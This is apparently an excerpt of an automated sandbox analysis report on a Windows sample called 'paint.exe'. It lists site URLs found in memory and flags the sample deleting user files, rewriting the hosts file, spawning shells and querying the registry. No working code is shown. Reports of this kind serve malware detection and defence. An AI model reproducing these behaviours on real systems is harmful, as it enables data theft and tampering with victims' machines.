              Source: paint.exe, 00000001.00000003.1920015922.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1693798726.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1694074874.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696653980.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2005810551.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: paint.exe, 00000001.00000003.1734071594.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920015922.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: paint.exe, 00000001.00000003.1735925915.0000020771AD5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771A3D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008879287.0000020771790000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772CC4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmp, paint.exe, 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: paint.exe, paint.exe, 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: paint.exe, 00000001.00000002.2009946233.0000020771B9C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.00000207714F1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\paint.exeFile deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\DTBZGIOOSO.docxJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\DTBZGIOOSO.docxJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\VLZDGUKUTZ.jpgJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\VLZDGUKUTZ.xlsxJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\ONBQCLYSPU.pdfJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 66

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,88_2_00007FF623DED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,88_2_00007FF623E1B57C
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF69D40_2_00007FF6F0BF69D4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF09380_2_00007FF6F0BF0938
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD8BD00_2_00007FF6F0BD8BD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD10000_2_00007FF6F0BD1000
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE3A140_2_00007FF6F0BE3A14
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE21D40_2_00007FF6F0BE21D4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE19B40_2_00007FF6F0BE19B4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE81540_2_00007FF6F0BE8154
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BEDACC0_2_00007FF6F0BEDACC
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE1BC00_2_00007FF6F0BE1BC0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDA34B0_2_00007FF6F0BDA34B
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDAD1D0_2_00007FF6F0BDAD1D
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDA4E40_2_00007FF6F0BDA4E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF3C800_2_00007FF6F0BF3C80
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE2C800_2_00007FF6F0BE2C80
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF09380_2_00007FF6F0BF0938
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF64880_2_00007FF6F0BF6488
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF5C700_2_00007FF6F0BF5C70
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE36100_2_00007FF6F0BE3610
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE1DC40_2_00007FF6F0BE1DC4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BEE5E00_2_00007FF6F0BEE5E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE5DA00_2_00007FF6F0BE5DA0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE9F100_2_00007FF6F0BE9F10
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF5EEC0_2_00007FF6F0BF5EEC
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE88040_2_00007FF6F0BE8804
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE1FD00_2_00007FF6F0BE1FD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF97980_2_00007FF6F0BF9798
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BE17B00_2_00007FF6F0BE17B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BEDF600_2_00007FF6F0BEDF60
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF411C0_2_00007FF6F0BF411C
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF18E40_2_00007FF6F0BF18E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BD98700_2_00007FF6F0BD9870
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF69D41_2_00007FF6F0BF69D4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF5C701_2_00007FF6F0BF5C70
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD10001_2_00007FF6F0BD1000
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE3A141_2_00007FF6F0BE3A14
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE21D41_2_00007FF6F0BE21D4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE19B41_2_00007FF6F0BE19B4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF09381_2_00007FF6F0BF0938
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE81541_2_00007FF6F0BE8154
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BEDACC1_2_00007FF6F0BEDACC
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE1BC01_2_00007FF6F0BE1BC0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD8BD01_2_00007FF6F0BD8BD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDA34B1_2_00007FF6F0BDA34B
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDAD1D1_2_00007FF6F0BDAD1D
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BDA4E41_2_00007FF6F0BDA4E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF3C801_2_00007FF6F0BF3C80
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE2C801_2_00007FF6F0BE2C80
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF09381_2_00007FF6F0BF0938
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF64881_2_00007FF6F0BF6488
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE36101_2_00007FF6F0BE3610
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE1DC41_2_00007FF6F0BE1DC4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BEE5E01_2_00007FF6F0BEE5E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE5DA01_2_00007FF6F0BE5DA0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE9F101_2_00007FF6F0BE9F10
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF5EEC1_2_00007FF6F0BF5EEC
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE88041_2_00007FF6F0BE8804
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE1FD01_2_00007FF6F0BE1FD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF97981_2_00007FF6F0BF9798
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BE17B01_2_00007FF6F0BE17B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BEDF601_2_00007FF6F0BEDF60
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF411C1_2_00007FF6F0BF411C
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BF18E41_2_00007FF6F0BF18E4
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FF6F0BD98701_2_00007FF6F0BD9870
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA012F01_2_00007FFDFAA012F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFAA018801_2_00007FFDFAA01880
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0290601_2_00007FFDFB029060
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0DCFB01_2_00007FFDFB0DCFB0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0E4CF01_2_00007FFDFB0E4CF0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB079D101_2_00007FFDFB079D10
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0792C01_2_00007FFDFB0792C0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0822E01_2_00007FFDFB0822E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0CBB801_2_00007FFDFB0CBB80
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0C4BB01_2_00007FFDFB0C4BB0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB069BA01_2_00007FFDFB069BA0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0B6BD01_2_00007FFDFB0B6BD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB063C101_2_00007FFDFB063C10
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB07CC401_2_00007FFDFB07CC40
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0C29E01_2_00007FFDFB0C29E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB089A301_2_00007FFDFB089A30
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB06FA201_2_00007FFDFB06FA20
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0D28661_2_00007FFDFB0D2866
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB06287E1_2_00007FFDFB06287E
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB06A8D01_2_00007FFDFB06A8D0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0CC8C01_2_00007FFDFB0CC8C0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0A59101_2_00007FFDFB0A5910
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0769401_2_00007FFDFB076940
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB1150301_2_00007FFDFB115030
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0EC0401_2_00007FFDFB0EC040
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0A4F001_2_00007FFDFB0A4F00
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0FCF201_2_00007FFDFB0FCF20
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB070DD01_2_00007FFDFB070DD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB08DE401_2_00007FFDFB08DE40
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB112C601_2_00007FFDFB112C60
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0BCCD01_2_00007FFDFB0BCCD0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB09CCE91_2_00007FFDFB09CCE9
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0F8D001_2_00007FFDFB0F8D00
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0EAD201_2_00007FFDFB0EAD20
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0BBD501_2_00007FFDFB0BBD50
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB06BD401_2_00007FFDFB06BD40
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0AF3601_2_00007FFDFB0AF360
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB07C3801_2_00007FFDFB07C380
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB08F3801_2_00007FFDFB08F380
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0EA3801_2_00007FFDFB0EA380
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB08D3A01_2_00007FFDFB08D3A0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0C73E01_2_00007FFDFB0C73E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0D44301_2_00007FFDFB0D4430
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB07D2B01_2_00007FFDFB07D2B0
